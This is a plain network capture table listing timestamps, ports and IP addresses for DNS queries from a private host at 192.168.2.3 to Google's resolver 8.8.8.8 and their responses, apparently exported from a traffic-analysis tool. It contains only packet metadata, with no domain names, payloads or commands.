Sep 1, 2022 00:02:19.471883059 CEST	53	65514	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.472414017 CEST	65515	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.491760969 CEST	53	65515	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.492209911 CEST	65516	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.512691975 CEST	53	65516	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.849414110 CEST	59820	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.925700903 CEST	53	59820	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.930727959 CEST	53	53049	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.932447910 CEST	59821	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.951675892 CEST	53	59821	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.952318907 CEST	59822	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.970587015 CEST	53	59822	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.973756075 CEST	59823	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:19.993907928 CEST	53	59823	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:19.994369984 CEST	59824	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:20.013947010 CEST	53	59824	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:20.014611959 CEST	59825	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:20.035240889 CEST	53	59825	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:20.450695992 CEST	64595	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:21.440356970 CEST	64595	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.022486925 CEST	53	64595	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.031480074 CEST	64596	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.050517082 CEST	53	64596	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.051454067 CEST	64597	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.069267035 CEST	53	64597	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.069673061 CEST	64598	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.074369907 CEST	53	64595	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.089488983 CEST	53	64598	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.089884996 CEST	64599	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.108500004 CEST	53	64599	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.108885050 CEST	64600	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:22.129991055 CEST	53	64600	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:22.575946093 CEST	52079	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:23.581091881 CEST	52079	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.596934080 CEST	52079	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.712889910 CEST	53	52079	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:24.728225946 CEST	64824	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.748702049 CEST	53	64824	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:24.749273062 CEST	64825	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.770515919 CEST	53	64825	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:24.770961046 CEST	64826	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.792413950 CEST	53	64826	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:24.792802095 CEST	64827	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.814188957 CEST	53	64827	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:24.814615965 CEST	64828	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:24.833614111 CEST	53	64828	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:25.179150105 CEST	51992	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.190792084 CEST	51992	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.233566046 CEST	53	51992	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.252104998 CEST	51993	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.270071030 CEST	53	51993	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.273853064 CEST	51994	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.293915987 CEST	53	51994	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.294404984 CEST	51995	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.312290907 CEST	53	51995	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.312895060 CEST	51996	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.332462072 CEST	53	51996	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.333412886 CEST	51997	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.352917910 CEST	53	51997	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.695220947 CEST	58119	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:26.714562893 CEST	53	52079	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:26.841078043 CEST	53	52079	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.386841059 CEST	53	51992	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.750152111 CEST	58119	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:27.784187078 CEST	53	58119	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.817483902 CEST	53	58119	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.858907938 CEST	58120	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:27.877135992 CEST	53	58120	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.883460045 CEST	58121	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:27.904680967 CEST	53	58121	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.905128002 CEST	58122	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:27.926455975 CEST	53	58122	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.969558001 CEST	58123	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:27.989053965 CEST	53	58123	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:27.993076086 CEST	58124	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:28.014046907 CEST	53	58124	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:29.601125002 CEST	49166	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:30.826258898 CEST	53	49166	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.371490955 CEST	49166	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.404072046 CEST	49167	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.422898054 CEST	53	49167	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.423641920 CEST	49168	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.442924023 CEST	53	49168	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.443413973 CEST	49169	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.465111017 CEST	53	49169	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.467434883 CEST	49170	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.486720085 CEST	53	49170	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.489443064 CEST	49171	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:32.510637999 CEST	53	49171	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:32.867223024 CEST	58301	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:33.862488031 CEST	58301	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:33.985611916 CEST	53	49166	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.407073975 CEST	53	58301	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.417866945 CEST	58302	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:34.435112000 CEST	53	58302	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.435885906 CEST	58303	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:34.459167957 CEST	53	58303	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.463043928 CEST	58304	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:34.484791994 CEST	53	58304	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.489913940 CEST	53	58301	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.497220993 CEST	58305	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:34.517954111 CEST	53	58305	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.518929958 CEST	58306	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:34.537820101 CEST	53	58306	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:34.851964951 CEST	63446	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.427285910 CEST	53	63446	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.437273979 CEST	63447	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.454541922 CEST	53	63447	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.455212116 CEST	63448	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.475027084 CEST	53	63448	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.476502895 CEST	63449	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.496222973 CEST	53	63449	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.496675014 CEST	63450	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.516345024 CEST	53	63450	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.516824961 CEST	63451	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.536685944 CEST	53	63451	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.859457016 CEST	49874	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:35.984587908 CEST	53	49874	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:35.995635033 CEST	49875	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:36.012811899 CEST	53	49875	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:36.017096996 CEST	49876	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:36.034972906 CEST	53	49876	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:36.035378933 CEST	49877	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:36.053332090 CEST	53	49877	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:36.053729057 CEST	49878	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:36.071810961 CEST	53	49878	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:36.072251081 CEST	49879	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:36.091907978 CEST	53	49879	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:36.459953070 CEST	65459	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:37.472609997 CEST	65459	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.497634888 CEST	65459	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.631139994 CEST	53	65459	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:38.640486956 CEST	65386	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.659338951 CEST	53	65386	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:38.660218000 CEST	65387	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.680645943 CEST	53	65387	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:38.683294058 CEST	65388	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.701905012 CEST	53	65388	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:38.719558001 CEST	65389	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.738066912 CEST	53	65389	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:38.738598108 CEST	65390	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:38.759218931 CEST	53	65390	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.027879000 CEST	53	65459	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.088742971 CEST	54153	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.143616915 CEST	53	65459	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.675185919 CEST	53	54153	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.691652060 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.710722923 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.711365938 CEST	54155	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.729000092 CEST	53	54155	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.730597973 CEST	54156	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.750302076 CEST	53	54156	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.751533031 CEST	54157	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.771075010 CEST	53	54157	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:39.772185087 CEST	54158	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:39.791596889 CEST	53	54158	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:40.153419018 CEST	64602	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.172076941 CEST	64602	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.822036982 CEST	53	64602	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:41.842334986 CEST	64603	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.861427069 CEST	53	64603	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:41.862104893 CEST	64604	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.881999969 CEST	53	64604	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:41.882664919 CEST	64605	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.902828932 CEST	53	64605	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:41.903320074 CEST	64606	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.921314955 CEST	53	64606	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:41.921899080 CEST	64607	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:41.941456079 CEST	53	64607	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:42.277318001 CEST	50784	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:42.283397913 CEST	53	64602	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.285449982 CEST	50784	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.320070028 CEST	53	50784	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.328716993 CEST	50785	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.345973015 CEST	53	50785	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.346779108 CEST	50786	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.366689920 CEST	53	50786	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.367193937 CEST	50787	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.386923075 CEST	53	50787	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.387386084 CEST	50788	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.405071020 CEST	53	50788	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.405654907 CEST	50789	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:43.425419092 CEST	53	50789	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:43.751919985 CEST	64121	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.279233932 CEST	53	64121	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.286156893 CEST	64122	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.305149078 CEST	53	64122	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.306859970 CEST	64123	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.326653957 CEST	53	64123	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.327136040 CEST	64124	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.346456051 CEST	53	64124	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.347197056 CEST	64125	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.366677999 CEST	53	64125	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.367091894 CEST	64126	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.386941910 CEST	53	64126	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.774935961 CEST	64967	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.819075108 CEST	53	64967	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.827179909 CEST	64968	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.846179008 CEST	53	64968	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.846894979 CEST	64969	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.864609003 CEST	53	64969	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.867082119 CEST	64970	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.886693001 CEST	53	64970	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.887150049 CEST	64971	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.908752918 CEST	53	64971	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:44.909322977 CEST	64972	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:44.929284096 CEST	53	64972	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:45.564925909 CEST	60825	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.551074982 CEST	60825	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.625612020 CEST	53	60825	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:46.632401943 CEST	49202	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.652822018 CEST	53	49202	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:46.656883001 CEST	49203	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.677609921 CEST	53	49203	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:46.678054094 CEST	49204	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.696248055 CEST	53	49204	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:46.696702003 CEST	49205	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.716310978 CEST	53	49205	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:46.717207909 CEST	49206	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:46.736613989 CEST	53	49206	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.066291094 CEST	64936	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.092792034 CEST	53	64936	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.096024036 CEST	53	60825	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.102243900 CEST	64937	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.119285107 CEST	53	64937	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.119975090 CEST	60474	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.137702942 CEST	53	60474	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.139273882 CEST	60475	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.159663916 CEST	53	60475	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.160135031 CEST	60476	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.179497957 CEST	53	60476	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.180254936 CEST	60477	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:47.199672937 CEST	53	60477	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:47.295221090 CEST	53	50784	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.143838882 CEST	59374	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.169800997 CEST	53	59374	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.243660927 CEST	59375	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.262660027 CEST	53	59375	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.263272047 CEST	59376	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.282622099 CEST	53	59376	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.283085108 CEST	59377	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.302493095 CEST	53	59377	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.340517998 CEST	59378	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.359857082 CEST	53	59378	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.360270023 CEST	59379	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:48.378109932 CEST	53	59379	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:48.992279053 CEST	56616	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.030847073 CEST	53	56616	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:49.039655924 CEST	56617	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.060447931 CEST	53	56617	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:49.105935097 CEST	56618	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.125612974 CEST	53	56618	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:49.126044989 CEST	56619	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.145709991 CEST	53	56619	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:49.146584034 CEST	56620	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.164716959 CEST	53	56620	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:49.211679935 CEST	56621	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:49.230854988 CEST	53	56621	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:50.544686079 CEST	61184	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:51.666511059 CEST	53	61184	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:52.608259916 CEST	61184	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.628920078 CEST	61185	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.647394896 CEST	53	61185	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:52.648139954 CEST	61186	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.669127941 CEST	53	61186	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:52.669550896 CEST	61187	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.691092014 CEST	53	61187	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:52.691628933 CEST	61188	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.712511063 CEST	53	61188	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:52.764321089 CEST	61189	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:52.786346912 CEST	53	61189	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.163081884 CEST	57387	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.169249058 CEST	53	61184	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.199151039 CEST	53	57387	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.207458973 CEST	57388	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.227545977 CEST	53	57388	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.228133917 CEST	57389	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.250277996 CEST	53	57389	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.250638962 CEST	57390	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.274090052 CEST	53	57390	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.276937962 CEST	57391	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.296488047 CEST	53	57391	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.296910048 CEST	57392	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:53.315620899 CEST	53	57392	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:53.660832882 CEST	50228	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.678829908 CEST	50228	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.707915068 CEST	53	50228	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.715509892 CEST	50229	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.727380991 CEST	53	50228	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.735213995 CEST	53	50229	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.735838890 CEST	50230	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.755316019 CEST	53	50230	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.755738974 CEST	50231	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.777358055 CEST	53	50231	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.777870893 CEST	50232	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.797842026 CEST	53	50232	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:54.805593014 CEST	50233	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:54.826921940 CEST	53	50233	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.193733931 CEST	53269	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.222019911 CEST	53	53269	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.231367111 CEST	53270	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.248954058 CEST	53	53270	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.260307074 CEST	53271	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.282449961 CEST	53	53271	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.282820940 CEST	53272	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.303663969 CEST	53	53272	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.304130077 CEST	53273	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.325366020 CEST	53	53273	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.325848103 CEST	53274	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.344696999 CEST	53	53274	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.844996929 CEST	59827	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.919511080 CEST	53	59827	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.932115078 CEST	59828	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.952475071 CEST	53	59828	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.953111887 CEST	59829	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.974069118 CEST	53	59829	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.974494934 CEST	59830	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:55.995476007 CEST	53	59830	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:55.995863914 CEST	59831	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:56.016655922 CEST	53	59831	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:56.017085075 CEST	59832	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:56.038196087 CEST	53	59832	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:56.404357910 CEST	62431	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.411904097 CEST	62431	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.439387083 CEST	53	62431	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.447629929 CEST	62432	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.449079037 CEST	53	62431	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.467147112 CEST	53	62432	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.467935085 CEST	62433	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.488708973 CEST	53	62433	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.492444992 CEST	62434	53	192.168.2.3	8.8.8.8
Sep 1, 2022 00:02:57.511897087 CEST	53	62434	8.8.8.8	192.168.2.3
Sep 1, 2022 00:02:57.512286901 CEST	62435	53	192.168.2.3	8.8.8.8
